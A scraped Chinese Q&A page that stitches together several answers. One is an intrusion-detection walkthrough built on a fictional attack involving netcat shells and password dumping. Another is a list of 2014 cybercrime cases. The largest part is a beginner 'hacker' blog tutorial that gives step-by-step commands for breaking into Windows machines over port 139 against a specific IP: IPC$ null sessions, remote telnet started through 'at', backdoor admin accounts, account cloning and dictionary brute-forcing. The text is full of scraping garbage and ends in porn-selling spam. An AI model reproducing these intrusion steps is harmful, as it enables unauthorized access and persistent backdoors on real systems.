文章大纲：

• 1、求一个 *** 入侵检测的具体实例！急！！
• 2、求《杜鹃蛋》黑客入侵实例
• 3、 *** 犯罪的案例有哪些？
• 4、侵入网站该看什么书
• 5、入侵网站或者破解BBS

求一个 *** 入侵检测的具体实例！急！！

现在假设出于某种原因我决定要侵入你的 *** 。我将从哪里开始呢？首先，我要尽可能地收集你的 *** 信息，这可以通过一系列程序完成，如whois、dig、nslookup、tracert，还可以使用一些在Internet上公开的信息。假设通过这些操作，我发现你的 *** 中有一小部分没有被防火墙所保护。然后，通过执行端口扫描，我注意到有许多机器的135、139、389和445端口都是开放的。

445端口是Win2K的一个致命后门。在Win2K中， *** B(Server Message Block，用于文件和打印共享服务)除了基于N *** （NetBIOS over TCP/IP，使用端口137, UDP端口138 和TCP端口139来实现基于TCP/IP的NETBIOS网际互联）的实现，还有直接通过445端口实现。如果win2000服务器允许N *** , 那么UDP端口137, 138, TCP 端口 139, 445将开放。如果 N *** 被禁止, 那么只有445端口开放。445端口的使用方式有以下2种：

＃ 当Win2K在允许N *** 情况下作为客户端连接 *** B服务器时，它会同时尝试连接139和445端口，如果445端口有响应，那么就发送TCP RST包给139端口断开连接，以455端口通讯来继续；当445端口无响应时，才使用139端口。

＃ 当Win2K在禁止N *** 情况下作为客户端来连接 *** B服务器时，那么它只会尝试连接445端口，如果无响应，那么连接失败。

现在继续我的发现假设。我还注意到许多机器的端口80和443也是开放的，这可能是一个IIS 5 Web服务器。

Ok，我做了以上的窥视工作，你能检测到我的活动吗？下面来分析一下。首先，发生了端口扫描，在扫描的过程中，你应该注意到 *** 的通信量有一个突然的增加。端口扫描通常表现为持续数分钟的稳定的通信量增加，时间的长短取决于扫描端口的多少。如何发现 *** 通信量的突然增加呢？有许多程序都可以完成这个功能，以下介绍3种Win2K内置 *** ：

*** 一

在Win2K中，可以启动“性能”程序，创建一个预设定流量限制的性能警报信息。例如，比较好的 *** 通信量指标包括TCP-Segments/Sec和Network Interface-Packets/Sec：

*** 二

在一个不是很忙碌的计算机上还有一个简单的 *** 通信量指示器，那就是为 *** 适配器建立一个任务栏图标。创建步骤是：选择“开始/设置/控制面板”，点击“ *** 和拨号连接”，右键点击“本地连接”，选择“属性”，选中“连接后在任务栏中显示图标”复选框：

这样，随着所有信息进出 *** ，将会有一个图标点亮在任务栏中一闪一闪:

*** 三

如果怀疑自己受到扫描，还可以使用一个内置的命令行工具netstat。键入以下命令：

Netstat -p tcp -n

如果目前正在被扫描，根据扫描所使用的工具，就会得到以下类似结果：

Active Connections

Proto Local Address Foreign Address State

TCP 127.13.18.201:2572 127.199.34.42:135 TIME_WAIT

TCP 127.13.18.201:2984 127.199.34.42:1027 TIME_WAIT

TCP 127.13.18.201:3106 127.199.34.42:1444 SYN_SENT

TCP 127.13.18.201:3107 127.199.34.42:1445 SYN_SENT

TCP 127.13.18.201:3108 127.199.34.42:1446 SYN_SENT

TCP 127.13.18.201:3109 127.199.34.42:1447 SYN_SENT

TCP 127.13.18.201:3110 127.199.34.42:1448 SYN_SENT

TCP 127.13.18.201:3111 127.199.34.42:1449 SYN_SENT

TCP 127.13.18.201:3112 127.199.34.42:1450 SYN_SENT

TCP 127.13.18.201:3113 127.199.34.42:1451 SYN_SENT

TCP 127.13.18.201:3114 127.199.34.42:1452 SYN_SENT

以上信息中，我们要重点注意在本地和外部地址上的连续端口以及大量的SYN_SENT信息。有些扫描工具还会显示ESTABLISHED或TIME_WAIT信息。总之，信息的关键在于连续的端口序列和来自同一主机的大量连接。

假设入侵行为2及应对措施

再回到假设的环境中来。在发现了一些机器没有被防火墙保护以及扫描到一些开放端口后，现在有几条路摆在我面前。其一是寻找你的 *** 中的弱点。Windows *** 口令用于使用Web服务器上的Web服务，这些 *** 登录信息对我来说是最有用的，因此我决定朝这个方向试一试。首先从一个机器下载帐号名列表，从中选出一个很少使用的，例如guest帐号。我用这个帐号尝试多次登录直到它被锁住，这样我就能推测设置的是什么帐号锁住策略了。然后我编写一个脚本对每个帐号都尝试多次登录，但不触发锁住条件。当然，管理员帐号一般是不会被锁住的。我启动脚本，并运行Whisker扫描器程序，它使用我为IIS服务器编写的一个脚本，来试探公共 *** 服务器信息。现在，可以坐等结果了。

在我的上述探测过程中，你那端应该从一些关键入侵检测记数器指标中接收到许多警报信息。之一个应该是Web Service-Connection Attempts/sec：

这个指标能显示出Web信息量的突然增加。

另一个非常重要的记数器是Web Service-Not Found Errors/sec：

由于类似于Whisker 的Web 扫描器要检查指定URL的存在，因此以上性能记数器就会显示出通信量的急剧增长和404 错误信息。因此，可以预先设定通信量的正常水平，然后一旦有针对你的扫描行为时，就会发出警报。

与此同时，在你的 *** 上也会有穷举法攻击（brute-force attack）。在这种情况下，能够帮助你的两个性能记数器分别是Server-Logon/sec和Server-Errors Logon：

对每秒两个以上的登录和五个以上的登录错误设置警报，这样就能知道是否有穷举攻击正在发生。同时，对安全事件日志进行检查，就能验证出大量的失败登录是否来自同一个计算机。

假设入侵行为3及应对措施

继续回到假设的环境中。现在，我的探测脚本已经结束运行，我发现你的 *** 中一台计算机的系统管理员口令为空，这表明该系统刚刚安装不久，还没有来得及进行保护。我用管理员帐号和空口令连接到那个机器上，将要做的之一件事就是上传一些木马类程序和运行状况检测程序，例如nc.exe、lsadump2.exe、tlist.exe以及一些扫描脚本。当然，你的系统上已经内置了我所需要的其它工具，如nbtstat.exe。我启动服务器的定时服务，设定nc.exe在一分钟后运行，并将cmd.exe重新定向到一个端口，如1234。一分钟后，我使用nc.exe从本地连接到远程计算机进入命令行状态，运行tlist.exe得到了当前程序列表，运行lsadump2.exe来查看存储的口令，或者浏览硬盘，得到想要的内容。

现在看看你能对以上攻击有何察觉以及能够采取的措施。打开任务管理器，你会注意到cmd.exe，它有一个很高的程序ID值；你还会注意到定时服务正在运行；你查看C:\Winnt\SchedLgU.txt，注意到就在刚才有一个nc.exe程序的内容，在任务列表中也同样有一个；使用Explorer的查找功能，你可以寻找最后一天中生成的所有文件，这不奇怪，你会在System32目录中发现许多新的可执行文件，包括nc.exe。你试图结束命令行操作，但是却未被允许，这时就可以断定发生了一个侵入行为，马上可以开始收集证据了。现在关闭计算机告诫攻击者已经被发现，因为你不想留给他进行实际攻击的时间。事件日志显示失败的登录尝试，在最后也会将成功的登录显示出来。但是，事件日志中的条目没有显示另一端计算机的IP地址，只是显示了计算机的名字。为了确定其IP地址，可以键入以下命令：

netstat -a –n

从显示信息中找到与本地 TCP端口139、UDP端口137以及端口445处于连接状态的IP地址信息。将输出保存在一个文件中，然后使用nbtstat程序在那个IP地址上执行一个名字查找：

nbtstat -A

在netstat 的输出中，你还应该能注意到一个与TCP端口1234的连接，这属于nc进程。你可能还会注意到许多与 *** 上其它计算机的 UDP 137 和138的连接。

假设入侵行为4及应对措施

再次回到假设的环境中。我还通过nc的远程命令行对你的内部 *** 中其它计算机进行了扫描，发现在一台名叫FILESERVER的计算机上有一个共享目录PUBLIC。我将这个共享进行映射，并开始嗅探工作。由于你的 *** 中其它计算机存在NetBIOS连接，因此你怀疑这个计算机会被利用并危及内部 *** 的安全。在命令行中键入以下命令：

net view

你可以从输出中观察到对内部文件服务器的驱动器映射情况。

在对你的硬盘浏览了一会儿之后，我再次运行tlist.exe，注意到现在屏幕保护程序不再运行了，并且打开了一个命令行窗口。我还不能肯定你是否发现了我，于是赶快对注册表的某些项目进行修改，以使计算机启动时再次运行netcat，最后断开连接。等了大约10分钟，我再次ping这个计算机，得到了一个请求超时应答。显然，你已经发现了我，于是我与“借来的”帐号说声白白。

小结：入侵检测跟踪信息6部分

以上这些入侵行为都是虚构的，并且有点简单，但是它展示了一个基于 *** 的攻击的许多要素，以及如何检测出这样的攻击。理论上而言，只要你坚持跟踪以下信息，那么几乎所有基于 *** 的攻击都能被检测出来：

# *** 上拥挤程度和 *** 连接

# Web拥挤程度和“pages not found”错误的发生次数

# 成功及失败的登录尝试

# 对文件系统所做的改变

# 当前运行的应用程序和服务

# 定时运行的应用程序或在启动时运行的应用程序

通过对这些内容进行跟踪，不需要任何外来的入侵检测软件就能阻止许多破坏企图。当然，其它应用程序也会很有帮助，但管理员必须时刻牢记以上六条。

结 语

本文描述的场景是在管理员在场的时候发生的一个攻击，而在真实生活中，一天24小时中可能发生许多次攻击。有些只是简单的端口扫描，而有些则是对 *** 的全面威胁。不管是哪种攻击，都不应该漠然坐视而不采取行动。通过本文介绍的应对措施，我们完全可以建立一个对自己 *** 有用的入侵检测系统：我们可以通过Email或者页面的方式发送警报信息，也可以使用定时服务来定时将当前运行的所有程序或 *** 连接写入日志文件。就是说，编写一些脚本程序，并借助定时服务以及少量的免费软件工具，我们就可以建立一个实用的入侵检测系统，其性能可能比市场上的许多入侵检测软件都要好得多。发现入侵者的关键不在于有多少强有力的软件，最重要的是要了解入侵者是如何行动的，并且比他们抢先一步。

老大 *** 里100积分才买3元 200积分才6元。没人为了几个积分自己花脑细胞给你写毕业论文的。

这个文章我复制的。算比较好的了。。。希望能帮到你。

求《杜鹃蛋》黑客入侵实例

这是一本很好的书，自从有了此书，我的人生就此改变，生活变得充实，未来不再迷茫。杜鹃蛋是你让我找回自信，端阳哥是你教会我如何做人。

同学们，不要再无知了，不要再堕落了，不要再迷恋电脑游戏这个侵蚀我们思想的精神 *** 。快去看杜鹃蛋吧。ASSIGNMENT与你同在！

*** 犯罪的案例有哪些？

1.江苏徐州“神马” *** 盗窃案

2014年3月19日，江苏徐州警方联合腾讯雷霆行动成功捣毁了一个以“下订单”为名，通过向多个网店店主的手机植入木马、拦截网银短信进行 *** 盗窃的犯罪团伙，在14省抓获涉案犯罪嫌疑人37名，瓦解了一个完整的“写马—免杀—种马—洗钱—分赃”黑产犯罪链条。该案受害人达261名，涉案金额2000余万元。

2.广州“1101-黑客”银行卡盗窃案

2014年5月，广州警方成功破获了一起利用黑客技术、对银行卡实施盗窃的特大案件，抓获犯罪嫌疑人11名。经调查，该团伙通过 *** 入侵的手段盗取多个网站的数据库，并将得到的数据在其他网站上尝试登录，经过大量冲撞比对后非法获得公民个人信息和银行卡资料数百万条，最后通过出售信息、网上盗窃等犯罪方式，非法获利1400余万元。

3.浙江湖州“5·15”诈骗短信案

2014年5月，浙江湖州警方摧毁了一个群发诈骗短信的犯罪团伙，抓获犯罪嫌疑人18名。经调查，自2012年以来，该团伙由组织者联系诈骗上家人员接收群发诈骗短信业务，再用 *** 、 *** 等渠道将任务派单给下家，由下家通过群发器、sim卡和电脑等设备，累计群发中奖等 *** 诈骗短信上亿条，非法获利300余万元。

4.重庆短信拦截木马盗窃案

2014年5月27日，重庆警方破获了一起利用短信拦截木马实施 *** 盗窃、并将赃款通过电商平台以购物、充话费、购买彩票等方式套现的案件，抓捕犯罪嫌疑人3名，两名主犯为应届大学生。经调查，嫌疑人将短信拦截木马伪造成婚恋网站的交友短信，通过感染受害人手机截取网银验证码，再修改其 *** 支付应用的密码，最后用受害人的银行卡去电商平台“套现”。

5.江苏扬州“3·18”钓鱼盗号案

2014年5月30日，江苏扬州警方成功捣毁了一个通过租用韩国服务器架设钓鱼网站、盗取受害者 *** 聊天账号及密码的盗号团伙，在广东和广西抓获犯罪嫌疑人6名。经调查，2014年1月至5月期间，该团伙向下游的 *** 诈骗犯罪分子出售非法盗取的180935组 *** 聊天账号及密码，获利157万余元。

6.北京“2·28”钓鱼盗刷信用卡案

2014年6月，北京警方成功摧毁了一个利用钓鱼网站盗取用户信用卡资料、并通过盗刷牟利的犯罪团伙，抓获盗号人员、机票 *** 、诈骗人员等嫌疑人31人，涉及盗刷案件520余起。经调查，该团伙通过某网站平台发布虚假信息，诱骗网民登录钓鱼网站，非法盗取网民的个人信息及信用卡资料;再与机票 *** 勾结，通过网上快捷支付的方式购买机票并出售。该犯罪团伙已形成了一个完整的盗取公民个人信息、盗刷信用卡的黑色产业链条，涉案金额达300余万元。

7.山东济南“1·15”航空旅客信息泄露案

2014年6月，山东济南警方成功摧毁了一个利用航空旅客信息进行诈骗的犯罪团伙，抓获犯罪嫌疑人13名，查清了某航空公司订票信息泄露源头，堵塞了安全漏洞。经调查，该犯罪团伙通过盗取旅客个人信息、倒卖信息、实施诈骗、取款分赃等犯罪环节，诈骗旅客30余人，涉案金额达70余万元。

侵入网站该看什么书

黑客新手教程--入侵

2006-11-12 08:42:34 / 天气: 晴朗 / 心情: 高兴

我的日志

对于刚刚学习黑客技术的朋友，时常会觉得无从下手，网上的教程满天飞，但即实用又贴近初学者的却不多，我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉，因此我的文章分为两个部份：之一部份是相关知识的介绍，第二部份是通过一次实例，详细讲述入侵过程和各种命令的运用。现在，let's go。

5e@pf9~)I0 之一部份：知识介绍爱好者博墅M t8pM+bnX,_

(1)什么是端口

i;eSN#v)Mf0 端口是各种程序为了接收和发送数据而开的“窗户”，程序需要它来与外界进行通讯，你可以把它想象成一个邮箱，我要传递消息给你，我就会把消息放到你的邮箱里。你要得到消息，你只需要打开邮箱把消息拿出来。同样，别的计算机为了和你的机器通讯，会把数据发到你的机器的端口上，计算机读取端口就可以得到数据。

0qn$jxW8R'h0 (2)端口是唯一的吗？

d h S F~p1j Q+Z0K0 端口不是唯一的。端口分两种：TCP端口和UDP端口，每种端口最多有65535个，分别用自然数1～65535编号。这里我不解释TCP端口和UDP端口有什么不同，你只须要知道不同的端口对应不同的程序，每个程序只能只能读取发送到属于自己端口上的数据。举个例子，hi.exe打开TCP6500端口，如果我把数据发送到TCP6501端口或是UDP6500端口，hi.exe都接收不到，只有发送到TCP6500端口的数据hi.exe才能接收。爱好者博墅t@#gN1P1BBS]

(3)TCP139端口的作用

\+g6k@"]0 TCP139是用于 *** 共享的端口，只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中，TCP139端口还有一个重要的作用：远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接，你需要管理员的用户名和密码，这也是基于139端口入侵的重点，只要我们得到了远程计算机的密码，再通过139端口进行IPC$连接，我们就完全控制了远程的计算机。

nSl;c)x_}y0 (4)必要命令的详解和相关工具的使用

st q'l(@SrC0b0 首先必须说明，为了你能在黑客道路上成长起来，拆了你的Win98,装上Windows2000吧，以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。

P @7i~]4W0 点击开始→运行，输入cmd.exe,跳出一个命令行窗口，你可得熟悉它，因为入侵时95%的工作都是在这里完成的。现在，我来介绍成功进行139入侵的几个必要命令：dir,cd,del,copy,net,at。

4p"g,r@duS5|0 dir的作用是列出指定路径下的目录和文件，输入c:\dir c:\ 就会列出C盘下的所有目录和文件，dir c:\winnt\ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的，通常某个目录下文件很多，一个屏幕显示不下，我们就会用到/p 如dir c:\ /p。/a是用来显示隐藏的文件、目录的，在Windows里设置一个文件属性为隐藏(假设此文件为c:\a.txt)，然后在命令行下输入dir c:\a.txt，你会发现系统告诉你找不到此文件(file not fount)，而输入dir c:\a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数，作用是搜索当前驱动器(C盘，D盘……)，查找指定文件。比如我要删除对方的主页文件index.asp，但不知到这个文件的位置，我们就可以利用dir index.asp /s在各个分区下进行搜索。

C['_^}9U A^0 cd的作用是进入目录，cd c:\winnt\system32 就到了system32目录之中了。不信你可以用dir和dir c:\winnt\system32，得到的结果是一样的，如果你要切换分区，c:\d: 就到了D盘下了，而不用cd d:，这点要注意。爱好者博墅/@Kb/HL;t ?5Q

del的作用是删除文件，del c:\a.txt 就把a.txt 给删了。

;}D |0uU3w0 copy的作用是拷贝文件，这个命令很重要，一定要熟练掌哦。copy c:\a.txt d:\mp3\b.txt 把C盘下的a.txt拷到D盘下的mp3目录下，并重命名为b.txt，注意哦，copy后的文件类型可以是任意的，copy c:\a.exe 就把文件类型改成了可执行文件。当然，a.exe 不会正常运行。爱好者博墅!r` z Bz1IVS Fx

net 命令是139端口入侵的重中之重，整个入侵过程会多次用到它。在命令行窗口下输入net，可以看到有一大堆参数，别被这一大堆参数吓怀了，现在我来为你一一讲解。

s C+Ay5? Y.}y0 net use

'qFqi ve0net use 命令用于与远程主机建立IPC$(管理)连接，当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时，在命令行窗口下输入net use\\IP\IPC$"password"/user:administrator，你就成功地建立了与远程计算机的连接。在这之后，可以对其进行管理了。net use 还有一个用处，即映射远程机器的共享资源，输入net use z: \\IP\C$ (注意！在此之后的一切命令都是基于之一个命令的，也就是说必须先建立IPC$连接后，这些命令才会成功)，打开“我的电脑”，你会发现多了一个Z盘，里面全是远程主机C盘下的东西，你在Z盘里删除了一个文件，对方C盘下的这个文件就也被删除了，所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样，是不是很有意思呢？爱好者博墅/^)o!e]L6{2z

net view爱好者博墅/v-o?MN'I.H

net view 用于查看远程计算机有哪些共享资源，通常你会看到my document之类的共享文件夹，输入net view \\IP即可。我个人认为net view 没有太大用处，要知道，在Windows2000中，各个硬盘都是共享的，但是如果你用net view 来查看，你会发现并无C,D,E 之类的共享资源。这是为什么呢？注意，在这之前的一些命令中，我们曾输入过IPC$,C$这样的奇怪东西，其实，Windows2000中，带"$"后缀的共享资源是隐藏的，在命令行窗口下是无法看到的，Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的，所以我们看不到，但确实存在，IPC$也是如此。爱好者博墅 J+NAy?sFt9F#Q

net share

*Y,\ IP"h.?;I8l~ H0net share 用于开放共享，输入net share *** =c:\tencent，你会发现多了一个名为 *** 的共享资源。这个命令有慎么作用呢？假设一个主机安全做的不错，关闭了IPC$,C$,D$ 等共享，那么我们就无法在139端口上建立管理连接，也无法访问对方的C盘，当我们通过别的手段进入后(如远程溢出)，我们就可以用net share 开放IPC$，从而转为熟悉的139端口的入侵，开放IPC$ 的命令为net share IPC$。相应的，如果你想关闭共享，你可以加上/del 后缀，例如net share c$ /del 就关闭了C盘的共享。爱好者博墅%b`rn0ja

net user爱好者博墅"q"R7p Qy"EO

net user 命令用于管理主机上的用户，仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。 爱好者博墅8y1d.Ur}kUs X

┎———————————————————————————————————————————————————————┒

6yYI#czO0 ┃ net user hacker 12345 /add 建立一个名为hacker，密码为12345的用户。 ┃

4LFNKBuV*v0 ┃ net user hacker /del 删除名为hacker的用户。 ┃ 爱好者博墅9iY%U1fI9Q;ypb'E

┃ net user hacker /active:no 禁用hacker这个用户，这个用户不能再登陆此计算机。 ┃爱好者博墅1C0q@ w[,zq*qR

┃ net user hacker /active:yes 激活已禁用的hacker这个用户。 ┃ 爱好者博墅;o#\4d#c;H,G

┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组，即提升hacker的权限，使之变为管理员 ┃

L5B.S XzK~"r%qO0┖———————————————————————————————————————————————————————┚

3\|;h aU,]0net start / net stop

iC!ok n0net start / net stop 命令用于起动/停止系统服务，通常我们会net stop w3svc (停止网页服务)，然后替换网页，对此命令我不多讲，知道即可。爱好者博墅"`k,H5au'S;O;U

*at 命令，net time

"g|?\f;VJ0之所以把它们放在一起来讲，是因为at命令要用到net time命令的结果，一般我们先 net view \\ip,得到远程主机的时间(假设得到的时间为9:00)，然后at \\ip 9:00 telnet 就启动了telnet服务，at这个命令就是用来远程运行程序的.

(5)需要准备的工具

p'ZXeY5z"j0 肉鸡猎手v1.0 扫描一个网段，找出弱密码的计算机爱好者博墅v8|+rMNO4YYFus

*** BCrack 针对特定主机，暴力猜解密码爱好者博墅 ^,f]cRs+n

DameWare Mini Remote Control 监控运程屏幕

~f9b fy#i"o0 CA.exe 克隆管理员账号

第二部份：入侵实例

,Kz/K ?#Hbw/k0今天打星际，被一高手反复摧残，郁闷ing……于是上网活动一下。打开肉鸡猎手，在开始IP和结束IP中填入想扫描的IP端，点击开始，不一会儿之后，两台肉鸡出现在我们面前(图一)。现在，让我们点击“开始”→“运行”→cmd.exe，打开可爱的命令行窗口。输入：net use \\218.80.236.37\IPC$ "" /user:administrator，提示“命令成功完成”。哈哈，现在我们就建立好了IPC$(远程管理连接)，再来，取得远程主机时间：net time \\218.80.236.37 显示: \\218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务，at \\218.80.236.37 10:32 telent，方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念，建立IPC$是为了能够使用at 命令来启动telent服务，几乎所有的命令都是在登陆远程主机之后使用，否则都是对你自己的计算机操作。)然后，telent 218.80.236.37 23，出现如图提示窗口(图二)，敲入administrator 回车两次，出现了命令提示符，现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户，这里我们只发现了administrator,guest,Iuser_KiKi三个用户，考虑到下次进入该主机时用户可能已经更改了administrator 的密码，为了能够顺利地再次进入，我们需要留下一个小后门。通常我们会这样做，输入net user guest/active:yes 激活guest 用户(guest用户系统内置的，因此每台计算机上都有，默认禁用此用户)。net user guest 12345 更改guest的密码为12345，net localgroup administrators guest /add 把guest的权限提升为管理员权限，这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后，你可以好好地在他的机子上逛一圈，看看有没有什么有趣的东西，顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便，那么跟我来，我将带你进入丰富多采的图形界面。现在，在命临行窗口下输入exit，显示“断开远程主机的连接”，我们用exit这个命令离开了远程主机，回到自己的机器上，点击载下来的DameWare，出现如图所示界面(图三)，在"host name"里填上对方IP，输入用户名administrator和密码(现在密码为空，所以不填)，点击"Connect"，然后等待DameWare拷贝文件，启动服务等一系列动作完成。一会而之后，出现如图(图四)窗口，里面现示的就是远程主机的桌面，别人的一举一动你都可以看见，你还可以接管他的鼠标，是不是挺有意思的呢？但是记住，我们是来学习技术的，并不是来破坏的，所以千万别做什么坏事哦。爱好者博墅"W e!Y8De

文章写到这里就告一段落了，其实对于入侵实例，有几点我想特别提一下：

#s3c#J7{6`DoD0 (1)肉鸡猎手只能搜密码为空的主机，所以只能一开始让我们练练手。一般要对139端口攻击，我们使用 *** BCrack这个软件，它是针对一台主机进行密码的暴力猜解的，速度非常快，在我机器上猜了24万个密码只用了半小时左右，命令行窗口下输入 *** bcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP，words.txt是字典，里面含有很多口令，你可以自己上网找找，好的字典能提高入侵的成功率。爱好者博墅-B4ejtb'a-S0Dr$A

(2)telent上对方的机器后，我们为了更加隐蔽地留下后门，常常使用CA.exe，CA是(clone administrator)的缩写，看名字你就应该知道，它可以把其它用户克隆成管理员，CA.exe \\218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass，把IUSR_VICTIM克隆成为管理员，密码是SetNewPass,克隆完成之后，一般是无法发现的，所以隐蔽性非常高。爱好者博墅.d Yk$RrIC9?

(3)at 这个命令有点搞笑，很多人先net view \\IP 看了时间后，再用at 来启动对方程序却常常失败，这是因为很多人都不知道，用net view \\IP 得到的时间不能直接用于at，这涉及到+12的问题，如果你看到对方的时间是 下午 3:00，那么at 应该这样使用at \\IP 15:00 telent。爱好者博墅8C,Q7Jr*M

好了，就说到这里了。相信看了本文之后，各位都能够成功地对139端口进行入侵，至于进去之后做什么，各位就自己发挥吧。

入侵网站或者破解BBS

首先你是个诚实的人

可是破解决不是一件简单的事 当然也没有多么复杂 靠的是智慧 或者更多的是运气。

理论上是可以破解的 实际上也有破解的实例。

但是对于你要看的这个网站 不一定很快就能破解出来

还有 以前我看过这样的网站（也是别人破解的密码），也没有多大意思。

有的论坛还是可以看的 这种东西 偶尔（空虚的时候）看一下

总看就没有劲了。

破解你可以参考一下这里

------------------------------------------------

你想看的片 赫赫 我这好多的

kama sutra X 爱指南

Better ‘S’‘E’‘X’视频

还有 playboy 系列的片子 playboy 的杂志

绝对震撼 绝对精彩

联系requestebooks@yahoo.com

注：非免费

==============================================

欢迎交流 交流几个网站还是可以的 :)